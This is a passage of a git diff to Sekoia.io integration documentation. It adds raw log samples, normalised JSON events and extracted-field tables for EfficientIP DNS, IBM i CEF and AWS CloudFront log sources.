"10.0.142.4", + "ip": "10.0.142.4", + "port": 36995 + }, + "dns": { + "header_flags": [ + "RD" + ], + "question": { + "class": "IN", + "name": "www.google.com", + "registered_domain": "google.com", + "subdomain": "www", + "top_level_domain": "com", + "type": "A" + }, + "type": "query" + }, + "network": { + "transport": "tcp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "hosts": [ + "www.google.com" + ], + "ip": [ + "10.0.142.2", + "10.0.142.4" + ] + }, + "server": { + "ip": "10.0.142.2" + } + } + + ``` + + +=== "dns_refused.json" + + ```json + + { + "message": "REFUSED unexpected RCODE resolving 'api.example.com/A/IN': 5.6.7.8#53", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "outcome": "failure", + "reason": "unexpected RCODE", + "type": [ + "info" + ] + }, + "dns": { + "question": { + "class": "IN", + "name": "api.example.com", + "registered_domain": "example.com", + "subdomain": "api", + "top_level_domain": "com", + "type": "A" + }, + "type": "query" + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "hosts": [ + "api.example.com" + ], + "ip": [ + "5.6.7.8" + ] + }, + "server": { + "ip": "5.6.7.8", + "port": 53 + } + } + + ``` + + +=== "dns_rssig_record.json" + + ```json + + { + "message": "client 172.16.2.36#61806 (id.hadron.ad.gt.): answer: id.hadron.ad.gt. IN TYPE65 (10.211.1.201) -> NOERROR 300 CNAME id.hadron.ad.gt.cdn.cloudflare.net. 300 HTTPS 1 . alpn=h2 ipv4hint=104.22.4.69,104.22.5.69,172.67.23.234 ipv6hint=2606:4700:10::6816:445,2606:4700:10::6816:545,2606:4700:10::ac43:17ea", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "type": [ + "info" + ] + }, + "client": { + "address": "172.16.2.36", + "ip": "172.16.2.36", + "port": 61806 + }, + "dns": { + "answers": [ + { + "data": "id.hadron.ad.gt.cdn.cloudflare.net.", + "ttl": 300, + "type": "CNAME" + }, + { + "data": "alpn=h2 ipv4hint=104.22.4.69,104.22.5.69,172.67.23.234 ipv6hint=2606:4700:10::6816:445,2606:4700:10::6816:545,2606:4700:10::ac43:17ea", + "ttl": 300, + "type": "HTTPS" + } + ], + "question": { + "class": "IN", + "name": "id.hadron.ad.gt.", + "registered_domain": "ad.gt", + "subdomain": "id.hadron", + "top_level_domain": "gt", + "type": "TYPE65" + }, + "response_code": "NOERROR", + "type": "answer" + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "hosts": [ + "id.hadron.ad.gt." + ], + "ip": [ + "10.211.1.201", + "172.16.2.36" + ] + }, + "server": { + "ip": "10.211.1.201" + } + } + + ``` + + +=== "test_rpz_notify.json" + + ```json + + { + "message": "zone rpz.ph.surbl.org/IN/outside: notify from 6.5.4.3#44152: serial 1720423233", + "event": { + "action": "notify", + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "reason": "serial 1720423233", + "type": [ + "info" + ] + }, + "dns": { + "type": "query" + }, + "efficientip": { + "rpz": { + "domain": "rpz.ph.surbl.org", + "query": { + "class": "IN" + }, + "view": "outside" + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "ip": [ + "6.5.4.3" + ] + }, + "source": { + "address": "6.5.4.3", + "ip": "6.5.4.3", + "port": 44152 + } + } + + ``` + + +=== "test_rpz_qname.json" + + ```json + + { + "message": "client @0x8871827c 1.2.3.4#65213 (example.com): rpz QNAME Local-Data rewrite example.com/A/IN via example.com.fr", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "type": [ + "info" + ] + }, + "client": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 65213 + }, + "dns": { + "type": "query" + }, + "efficientip": { + "rpz": { + "domain": "example.com", + "query": { + "class": "IN" + }, + "source": { + "name": "example.com.fr" + }, + "view": "A" + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + } + } + + ``` + + +=== "test_rpz_refused.json" + + ```json + + { + "message": "zone rpz.ph.surbl.org/IN/outside: refused notify from non-master: 7507:2649:84be:353:95f9:eee1:65e9:44b4#47300", + "event": { + "action": "refused notify", + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "reason": "7507:2649:84be:353:95f9:eee1:65e9:44b4#47300", + "type": [ + "info" + ] + }, + "dns": { + "type": "query" + }, + "efficientip": { + "rpz": { + "domain": "rpz.ph.surbl.org", + "query": { + "class": "IN" + }, + "source": { + "name": "non-master" + }, + "view": "outside" + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + } + } + + ``` + + +=== "test_rpz_transfer_1.json" + + ```json + + { + "message": "transfer of 'rpz.ph.surbl.org/IN/outside' from 1.2.3.4#53: connected using 3.4.5.6#65242", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "reason": "connected using 3.4.5.6#65242", + "type": [ + "info" + ] + }, + "dns": { + "type": "query" + }, + "efficientip": { + "rpz": { + "domain": "rpz.ph.surbl.org", + "query": { + "class": "IN" + }, + "view": "outside" + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "server": { + "ip": "1.2.3.4", + "port": 53 + } + } + + ``` + + +=== "test_rpz_transfer_2.json" + + ```json + + { + "message": "transfer of 'rpz.abuse.surbl.org/IN/dmz' from 1.2.3.4#53: Transfer status: success", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "reason": "Transfer status: success", + "type": [ + "info" + ] + }, + "dns": { + "type": "query" + }, + "efficientip": { + "rpz": { + "domain": "rpz.abuse.surbl.org", + "query": { + "class": "IN" + }, + "view": "dmz" + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "server": { + "ip": "1.2.3.4", + "port": 53 + } + } + + ``` + + +=== "test_rpz_transfer_3.json" + + ```json + + { + "message": "transfer of 'rpz.cr.surbl.org/IN/dmz' from 1.2.3.4#53: Transfer completed: 1 messages, 8 records, 344 bytes, 0.026 secs (13230 bytes/sec) (serial 1720423198)", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "reason": "Transfer completed: 1 messages, 8 records, 344 bytes, 0.026 secs (13230 bytes/sec) (serial 1720423198)", + "type": [ + "info" + ] + }, + "dns": { + "type": "query" + }, + "efficientip": { + "rpz": { + "domain": "rpz.cr.surbl.org", + "query": { + "class": "IN" + }, + "view": "dmz" + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "server": { + "ip": "1.2.3.4", + "port": 53 } } @@ -629,8 +1391,8 @@ The following table lists the fields that are extracted, normalized under the EC | Name | Type | Description | | ---- | ---- | ---------------------------| -|`@timestamp` | `date` | Date/time when the event originated. | |`client.ip` | `ip` | IP address of the client. | +|`client.port` | `long` | Port of the client. | |`dns.answers` | `object` | Array of DNS answers. | |`dns.header_flags` | `keyword` | Array of DNS header flags. | |`dns.question.class` | `keyword` | The class of records being queried. | @@ -640,14 +1402,23 @@ The following table lists the fields that are extracted, normalized under the EC |`dns.type` | `keyword` | The type of DNS event captured, query or answer. | |`efficientip.guardian_action` | `keyword` | EfficientIP Guardian action | |`efficientip.guardian_trigger_name` | `keyword` | Name of the EfficientIP Guardian trigger | +|`efficientip.list_names` | `array` | Names of the retrictions lists that matched the query | +|`efficientip.rpz.domain` | `keyword` | The domain of the rpz zone | +|`efficientip.rpz.query.class` | `keyword` | The query_class of the rpz request | +|`efficientip.rpz.source.name` | `keyword` | The name of the source of the rpz request | +|`efficientip.rpz.view` | `keyword` | The view of the rpz request | +|`efficientip.tag_names` | `array` | List of tags that matched the query | |`event.action` | `keyword` | The action captured by the event. | |`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | |`event.dataset` | `keyword` | Name of the dataset. | +|`event.outcome` | `keyword` | The outcome of the event. The lowest level categorization field in the hierarchy. | +|`event.reason` | `keyword` | Reason why this event happened, according to the source | |`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | -|`host.name` | `keyword` | Name of the host. | |`network.transport` | `keyword` | Protocol Name corresponding to the field `iana_number`. | |`observer.vendor` | `keyword` | Vendor name of the observer. | |`server.ip` | `ip` | IP address of the server. | +|`server.port` | `long` | Port of the server. | +|`source.ip` | `ip` | IP address of the source. | |`source.port` | `long` | Port of the source. | diff --git a/_shared_content/operations_center/integrations/generated/f95fea50-533c-4897-9272-2f8361e63644_sample.md b/_shared_content/operations_center/integrations/generated/f95fea50-533c-4897-9272-2f8361e63644_sample.md index 4b439c9a5c..179114150b 100644 --- a/_shared_content/operations_center/integrations/generated/f95fea50-533c-4897-9272-2f8361e63644_sample.md +++ b/_shared_content/operations_center/integrations/generated/f95fea50-533c-4897-9272-2f8361e63644_sample.md @@ -4,10 +4,26 @@ In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. +=== "dns_format_error" + + ``` + DNS format error from 7507:2649:84be:353:95f9:eee1:65e9:44b4#53 resolving ejp.rlcdn.com/AAAA for 1.2.3.4#55198: Name rlcdn.com (SOA) not subdomain of zone ejp.rlcdn.com -- invalid response + ``` + + + +=== "dns_formerr" + + ``` + FORMERR resolving 'api.example.com/AAAA/IN': 1111:2222:3333:4444::1#53 + ``` + + + === "dns_guardian_answer1" ``` - Nov 6 13:43:39 doh-2eu-guardian named[74943]: client 10.242.101.27#46671 (meet.google.com.): answer: meet.google.com. IN TYPE65 (10.242.101.187) -> NOERROR + client 10.242.101.27#46671 (meet.google.com.): answer: meet.google.com. IN TYPE65 (10.242.101.187) -> NOERROR ``` @@ -15,7 +31,7 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_guardian_answer2" ``` - Nov 6 13:44:56 doh-2eu-guardian named[74943]: client 10.242.101.27#34229 (community.efficientip.com.): answer: community.efficientip.com. IN A (10.242.101.187) -> NOERROR 474 CNAME eip-community.hosted-by-discourse.com. 174 A 184.104.178.47 + client 10.242.101.27#34229 (community.efficientip.com.): answer: community.efficientip.com. IN A (10.242.101.187) -> NOERROR 474 CNAME eip-community.hosted-by-discourse.com. 174 A 184.104.178.47 ``` @@ -23,7 +39,7 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_guardian_arming" ``` - Oct 3 18:23:27 doh-2eu-guardian named[74943]: ARMING trigger on 37.169.153.147.f6:ec:1e:e3:7a:b1.ei6pt (action:QUARANTINE) (Suspicious Behavior) + ARMING trigger on 37.169.153.147.f6:ec:1e:e3:7a:b1.ei6pt (action:QUARANTINE) (Suspicious Behavior) ``` @@ -31,7 +47,23 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_guardian_disarming" ``` - Oct 3 18:24:28 doh-2eu-guardian named[74943]: DISARMING trigger on 37.169.153.147.f6:ec:1e:e3:7a:b1.ei6pt (action:QUARANTINE) (Suspicious Behavior) + DISARMING trigger on 37.169.153.147.f6:ec:1e:e3:7a:b1.ei6pt (action:QUARANTINE) (Suspicious Behavior) + ``` + + + +=== "dns_guardian_listlog" + + ``` + List Matched 192.168.1.226#32622: query: www.combatcorner.com IN A (192.168.1.209) {DTP} [phishing,active30] + ``` + + + +=== "dns_guardian_listlog2" + + ``` + List Matched 192.168.1.226#46937: query: www.dsmqlkdsq.com IN A (192.168.1.209) {DTP,internal_clients} ``` @@ -39,7 +71,7 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_guardian_query1" ``` - Nov 6 13:43:39 doh-2eu-guardian named[74943]: client 10.242.101.27#46671: query: meet.google.com IN TYPE65 (10.242.101.187) + client 10.242.101.27#46671: query: meet.google.com IN TYPE65 (10.242.101.187) ``` @@ -47,7 +79,15 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_guardian_query2" ``` - Nov 6 13:44:56 doh-2eu-guardian named[74943]: client 10.242.101.27#34229: query: community.efficientip.com IN A (10.242.101.187) + client 10.242.101.27#34229: query: community.efficientip.com IN A (10.242.101.187) + ``` + + + +=== "dns_https_record" + + ``` + 26914:client 1.2.3.4#52283 (cdnjs.cloudflare.com.): answer: cdnjs.cloudflare.com. IN TYPE65 (5.6.7.8) -> NOERROR 205 HTTPS 1 . alpn=h3,h2 ipv4hint=104.17.24.14,104.17.25.14 ipv6hint=2606:4700::6811:180e,2606:4700::6811:190e 205 RRSIG HTTPS 13 ``` @@ -55,7 +95,23 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_named_query" ``` - Nov 6 14:06:24 0dl10sds named[14006]: client @0x7ee2b158 10.0.142.4#39897 (www.google.com): query: www.google.com IN A +E(0)K (10.0.142.2) + client @0x7ee2b158 10.0.142.4#39897 (www.google.com): query: www.google.com IN A +E(0)K (10.0.142.2) + ``` + + + +=== "dns_named_query_1" + + ``` + client @0x7ee2b158 1.2.3.4#50426: updating zone 'test.fr/IN': deleting rrset at 'test.test.fr' AAAA + ``` + + + +=== "dns_named_query_2" + + ``` + client 1.2.3.4#63572 (app.test.com.): answer: app.test.com. IN A (1.2.3.4) -> NOERROR 300 A 1.2.3.4 300 A 1.2.3.4 300 RRSIG A 13 3 300 20240815085545 20240813065545 34505 test.com. xxxxxxxxxxxxx ``` @@ -63,7 +119,7 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_named_query_cd" ``` - Nov 6 14:08:18 0dl10sds named[14006]: client @0x7a4f3158 10.0.142.4#36506 (www.google.com): query: www.google.com IN A +E(0)CK (10.0.142.2) + client @0x7a4f3158 10.0.142.4#36506 (www.google.com): query: www.google.com IN A +E(0)CK (10.0.142.2) ``` @@ -71,7 +127,7 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_named_query_dnssec" ``` - Nov 6 14:09:07 0dl10sds named[14006]: client @0x81a97158 10.0.142.4#49968 (www.google.com): query: www.google.com IN A +E(0)DK (10.0.142.2) + client @0x81a97158 10.0.142.4#49968 (www.google.com): query: www.google.com IN A +E(0)DK (10.0.142.2) ``` @@ -79,7 +135,71 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_named_query_tcp" ``` - Nov 6 14:04:34 0dl10sds named[14006]: client @0x7a532158 10.0.142.4#36995 (www.google.com): query: www.google.com IN A +E(0)TK (10.0.142.2) + client @0x7a532158 10.0.142.4#36995 (www.google.com): query: www.google.com IN A +E(0)TK (10.0.142.2) + ``` + + + +=== "dns_refused" + + ``` + REFUSED unexpected RCODE resolving 'api.example.com/A/IN': 5.6.7.8#53 + ``` + + + +=== "dns_rssig_record" + + ``` + client 172.16.2.36#61806 (id.hadron.ad.gt.): answer: id.hadron.ad.gt. IN TYPE65 (10.211.1.201) -> NOERROR 300 CNAME id.hadron.ad.gt.cdn.cloudflare.net. 300 HTTPS 1 . alpn=h2 ipv4hint=104.22.4.69,104.22.5.69,172.67.23.234 ipv6hint=2606:4700:10::6816:445,2606:4700:10::6816:545,2606:4700:10::ac43:17ea + ``` + + + +=== "test_rpz_notify" + + ``` + zone rpz.ph.surbl.org/IN/outside: notify from 6.5.4.3#44152: serial 1720423233 + ``` + + + +=== "test_rpz_qname" + + ``` + client @0x8871827c 1.2.3.4#65213 (example.com): rpz QNAME Local-Data rewrite example.com/A/IN via example.com.fr + ``` + + + +=== "test_rpz_refused" + + ``` + zone rpz.ph.surbl.org/IN/outside: refused notify from non-master: 7507:2649:84be:353:95f9:eee1:65e9:44b4#47300 + ``` + + + +=== "test_rpz_transfer_1" + + ``` + transfer of 'rpz.ph.surbl.org/IN/outside' from 1.2.3.4#53: connected using 3.4.5.6#65242 + ``` + + + +=== "test_rpz_transfer_2" + + ``` + transfer of 'rpz.abuse.surbl.org/IN/dmz' from 1.2.3.4#53: Transfer status: success + ``` + + + +=== "test_rpz_transfer_3" + + ``` + transfer of 'rpz.cr.surbl.org/IN/dmz' from 1.2.3.4#53: Transfer completed: 1 messages, 8 records, 344 bytes, 0.026 secs (13230 bytes/sec) (serial 1720423198) ``` diff --git a/_shared_content/operations_center/integrations/generated/fc03f783-5039-415e-915a-a4b010d9a872.md b/_shared_content/operations_center/integrations/generated/fc03f783-5039-415e-915a-a4b010d9a872.md index 24a4d237a6..cf48a096bd 100644 --- a/_shared_content/operations_center/integrations/generated/fc03f783-5039-415e-915a-a4b010d9a872.md +++ b/_shared_content/operations_center/integrations/generated/fc03f783-5039-415e-915a-a4b010d9a872.md @@ -1,5 +1,5 @@ -## Event Categories +### Event Categories The following table lists the data source offered by this integration. @@ -25,10 +25,9 @@ In details, the following table denotes the type of events produced by this inte -## Event Samples - -Find below few samples of events and how they are normalized by Sekoia.io. +### Transformed Events Samples after Ingestion +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "cpc1126_1.json" @@ -712,7 +711,7 @@ Find below few samples of events and how they are normalized by Sekoia.io. -## Extracted Fields +### Extracted Fields The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. @@ -742,3 +741,6 @@ The following table lists the fields that are extracted, normalized under the EC |`source.port` | `long` | Port of the source. | |`user.name` | `keyword` | Short name or login of the user. | + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/IBM/ibm_i). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/fc03f783-5039-415e-915a-a4b010d9a872_sample.md b/_shared_content/operations_center/integrations/generated/fc03f783-5039-415e-915a-a4b010d9a872_sample.md new file mode 100644 index 0000000000..b0ae426cde --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/fc03f783-5039-415e-915a-a4b010d9a872_sample.md @@ -0,0 +1,126 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "cpc1126_1" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|CPC1126|Low|act=CodeSample reason=CPC1126 msg=The user QSYSOPR has stopped the job 080352/QTMHHTTP/ADMIN. suser=QSYSOPR sproc=086157/QSYSOPR/UPSA_QHTTP shost=EXPC3 + ``` + + + +=== "cpc1126_2" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|CPC1126|Low|reason=CPC1126 msg=L'utilisateur QSYSOPR a arrĂȘt{ le travail 080352/QTMHHTTP/ADMIN. suser=QSYSOPR sproc=086157/QSYSOPR/UPSA_QHTTP shost=EXPC3 + ``` + + + +=== "cpf0907" + + ``` + CEF:0|IBM|IBM i|7.4|MSGMON|CPF0907|5|cat=MSG Queue Messages rt=2020-04-30-11.35.29.886549 reason=CPF0907 cs1Label=msgSev cs1=ERROR cs2Label=msgQueue cs2=QSYS/QSYSOPR cs3Label=pgmName cs3=QWCATARE msg=Serious storage condition may exist. Press HELP. cs4Label=srdb cs4=I5OSP4 suser=QSYS sproc=541034/QSYS/QSYSARB5 shost=I5OSP4 + ``` + + + +=== "cpf0927" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|CPF0927|Low|reason=CPF0927 msg=Subsystem QBATCH stopped suser=QSYS sproc=080211/QSYS/QSYSARB4 shost=EXPC3 + ``` + + + +=== "cpf1124_1" + + ``` + CEF:0|IBM|IBM i|7.4|QSYS-QHST|CPF1124|Low|reason=CPF1124 msg=Job 722506/QZRDSRMOWN/SLMSQMONS started on 25.08.20 at 18:59:04 in subsystem SLSBS in QZRDSECSRM. Job entered system on 25.08.20 at 18:59:04. suser=QZRDSRMOWN sproc=722506/QZRDSRMOWN/SLMSQMONS shost=EXPC3 + ``` + + + +=== "cpf1124_2" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|CPF1124|Low|reason=CPF1124 msg=Travail 086167/QZRDSRMOWN/SLMSQMONS d{marr{ le 12/03/24 @ 02:08:51 dans le sous-syst}me SLSBS de QZRDSECSRM ; soumis le 12/03/24 @ 02:08:51. suser=QZRDSRMOWN sproc=086167/QZRDSRMOWN/SLMSQMONS shost=EXPC3 + ``` + + + +=== "cpf1164_1" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|CPF1164|High|reason=CPF1164 msg=Job 111111/JDOE/JPRC stopped at 12/03/24 @ 02:06:54; UC time 0,002; exit code 123 . suser=JDOE sproc=111111/JDOE/JPRC shost=EXPC3 + ``` + + + +=== "cpf1164_2" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|CPF1164|High|reason=CPF1164 msg=Travail 080694/QSPLJOB/RMTW000008 arrĂȘt{ le 12/03/24 @ 02:05:56; temps UC 0,005; code fin 50 . suser=QSPLJOB sproc=080694/QSPLJOB/RMTW000008 shost=EXPC3 + ``` + + + +=== "cpi3e34_1" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|CPI3E34|Low|reason=CPI3E34 msg=User QBRMS, client 192.168.242.20, was connected to the job 086171/QUSER/QRWTSRVR in the subsystem QSYSWRK, QSYS, 12/03/24, 02:16:22. suser=QBRMS sproc=086171/QUSER/QRWTSRVR shost=EXPC3 + ``` + + + +=== "cpi3e34_2" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|CPI3E34|Low|reason=CPI3E34 msg=L'utilisateur QBRMS, client 192.168.242.20, est connect{ au travail 086171/QUSER/QRWTSRVR dans le sous-syst}me QSYSWRK, QSYS, 12/03/24, 02:16:22. suser=QBRMS sproc=086171/QUSER/QRWTSRVR shost=EXPC3 + ``` + + + +=== "db2mon" + + ``` + CEF:0|IBM|IBM i|7.4|DB2MON|DB2 change monitoring (Journal Extract Tool)|3|act=UPDATE rt=2020-04-30-12.11.52.265056 sproc=551907/BARLEN/QPADEV000D shost=I5OSP4 suser=BARLEN fname=QZRDSECSRM/SLTHSTENT cs1Label=pgmName cs1=CFGSLHSTP cs2Label=updatedColumnNames cs2=EVTUSER1,EVTMSGID1,EVTMSGID2,EVTMSGID3 cs5Label=rowDataBefore cs5=QJ_JOURNAL_ENTRY_TYPE\="UB" QJ_RECEIVER_NAME\="DETRCV0010" QJ_SEQUENCE_NUMBER\="22145" EVTUSER1\="BARLEN" EVTMSGID1\="CPF1122" EVTMSGID2\="CPF9998" EVTMSGID3\="SLS0040" cs4Label=rowDataAfter cs4=QJ_JOURNAL_ENTRY_TYPE\="UP" QJ_RECEIVER_NAME\="DETRCV0010" QJ_SEQUENCE_NUMBER\="22146" EVTUSER1\="BARLEN3" EVTMSGID1\="CPF1129" EVTMSGID2\="CPF9997" EVTMSGID3\="SLS0042" + ``` + + + +=== "isfmon" + + ``` + CEF:0|IBM|IBM i|7.4|IFSMON|IFS File Monitor Journal Entry Type B-WA|3|act=B-WA Write, after-image event sproc=722496/BARLEN/QZSHSH suser=BARLEN shost=CTCSECT5 filePath=/home/barlen/ifsmon/weblog2.log fileType=*STMF cs2Label=changedDataLength cs2=0000000064 cs3Label=changedDataPart cs3=*ONLY cs4Label=changedDataFileOffset cs4=00000000000000788915 cs1Label=changedData cs1=Unauthorized access to Web resource accountInfo by user TBARLEN + ``` + + + +=== "taf" + + ``` + CEF:0|IBM|IBM i|7.4|QSYS-QAUDJRN|T-AF|Medium|reason=Authority failure msg=Not authorized to object fileType=*PGM cs1Label=objName cs1=QZRDSECSRM/CFGJSCR suser=THOMAS sproc=722470/THOMAS/QPADEV000P shost=I5OSP4 src=192.168.126.71 spt=36868 evtAggregation=*NO entryTypeField=A + ``` + + + +=== "tcd" + + ``` + CEF:0|IBM|IBM i|7.4|QSYS-QAUDJRN|T-CD|Low|reason=Command string audit msg=Command run interactively from a command line or by choosing a menu option that runs a CL command - CHGENVVAR ENVVAR(test4) VALUE(77777) LEVEL(*SYS) fileType=*CMD cs1Label=objName cs1=QSYS/CHGENVVAR suser=BARLEN sproc=721738/BARLEN/QPADEV000Q shost=I5OSP4 src=192.168.126.71 spt=36888 evtAggregation=*NO entryTypeField=C + ``` + + + +=== "tcp2617" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|TCP2617|Low|reason=TCP2617 msg=TCP/IP connection to remote system 10.1.43.58 closed, reason code 1. suser=QSYS sproc=080247/QSYS/QTCPWRK shost=EXPC3 + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/fc99c983-3e6c-448c-97e6-7e0948e12415.md b/_shared_content/operations_center/integrations/generated/fc99c983-3e6c-448c-97e6-7e0948e12415.md index b436630489..6c18e52fd2 100644 --- a/_shared_content/operations_center/integrations/generated/fc99c983-3e6c-448c-97e6-7e0948e12415.md +++ b/_shared_content/operations_center/integrations/generated/fc99c983-3e6c-448c-97e6-7e0948e12415.md @@ -25,7 +25,77 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. + +=== "get_record.json" + + ```json + + { + "message": "{\"date\":\"2024-07-17\",\"x-edge-location\":\"XXXXXXX\",\"sc-bytes\":\"1289\",\"c-ip\":\"1.2.3.4\",\"cs-method\":\"GET\",\"cs(Host)\":\"xxxxxxxxxxxx.cloudfront.net\",\"cs-uri-stem\":\"/en-us/api/\",\"sc-status\":\"200\",\"cs(Referer)\":\"-\",\"cs(User-Agent)\":\"_\",\"cs-uri-query\":\"-\",\"cs(Cookie)\":\"-\",\"x-edge-result-type\":\"Miss\",\"x-edge-request-id\":\"_\",\"x-host-header\":\"cache.example.org\",\"cs-protocol\":\"https\",\"cs-bytes\":\"_\",\"time-taken\":\"_\",\"x-forwarded-for\":\"_\",\"ssl-protocol\":\"TLSv1.3\",\"ssl-cipher\":\"TLS_AES_128_GCM_SHA256\",\"x-edge-response-result-type\":\"Miss\",\"cs-protocol-version\":\"HTTP/1.1\",\"fle-status\":\"-\",\"fle-encrypted-fields\":\"-\",\"c-port\":\"_\",\"time-to-first-byte\":\"_\",\"x-edge-detailed-result-type\":\"Miss\",\"sc-content-type\":\"application/json\",\"sc-content-len\":\"-\",\"sc-range-start\":\"-\",\"sc-range-end\":\"-\",\"count\":2,\"start_time\":\"09:08:27\",\"end_time\":\"09:08:27\"}\n", + "event": { + "action": "Miss", + "category": [ + "web" + ], + "type": [ + "access" + ] + }, + "@timestamp": "2024-07-17T09:08:27Z", + "cloud": { + "provider": "aws", + "service": { + "name": "cloudfront" + } + }, + "destination": { + "address": "xxxxxxxxxxxx.cloudfront.net", + "domain": "xxxxxxxxxxxx.cloudfront.net", + "registered_domain": "cloudfront.net", + "subdomain": "xxxxxxxxxxxx", + "top_level_domain": "net" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 200 + } + }, + "network": { + "protocol": "https" + }, + "related": { + "hosts": [ + "xxxxxxxxxxxx.cloudfront.net" + ], + "ip": [ + "1.2.3.4" + ] + }, + "sekoiaio": { + "repeat": { + "count": 2 + } + }, + "server": { + "geo": { + "name": "XXXXXXX" + } + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "path": "/en-us/api/" + } + } + + ``` + === "miss_record.json" diff --git a/_shared_content/operations_center/integrations/generated/fc99c983-3e6c-448c-97e6-7e0948e12415_sample.md b/_shared_content/operations_center/integrations/generated/fc99c983-3e6c-448c-97e6-7e0948e12415_sample.md index e7f3810eac..6cecae6ec4 100644 --- a/_shared_content/operations_center/integrations/generated/fc99c983-3e6c-448c-97e6-7e0948e12415_sample.md +++ b/_shared_content/operations_center/integrations/generated/fc99c983-3e6c-448c-97e6-7e0948e12415_sample.md @@ -4,6 +4,51 @@ In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. +=== "get_record" + + + ```json + { + "date": "2024-07-17", + "x-edge-location": "XXXXXXX", + "sc-bytes": "1289", + "c-ip": "1.2.3.4", + "cs-method": "GET", + "cs(Host)": "xxxxxxxxxxxx.cloudfront.net", + "cs-uri-stem": "/en-us/api/", + "sc-status": "200", + "cs(Referer)": "-", + "cs(User-Agent)": "_", + "cs-uri-query": "-", + "cs(Cookie)": "-", + "x-edge-result-type": "Miss", + "x-edge-request-id": "_", + "x-host-header": "cache.example.org", + "cs-protocol": "https", + "cs-bytes": "_", + "time-taken": "_", + "x-forwarded-for": "_", + "ssl-protocol": "TLSv1.3", + "ssl-cipher": "TLS_AES_128_GCM_SHA256", + "x-edge-response-result-type": "Miss", + "cs-protocol-version": "HTTP/1.1", + "fle-status": "-", + "fle-encrypted-fields": "-", + "c-port": "_", + "time-to-first-byte": "_", + "x-edge-detailed-result-type": "Miss", + "sc-content-type": "application/json", + "sc-content-len": "-", + "sc-range-start": "-", + "sc-range-end": "-", + "count": 2, + "start_time": "09:08:27", + "end_time": "09:08:27" + } + ``` + + + === 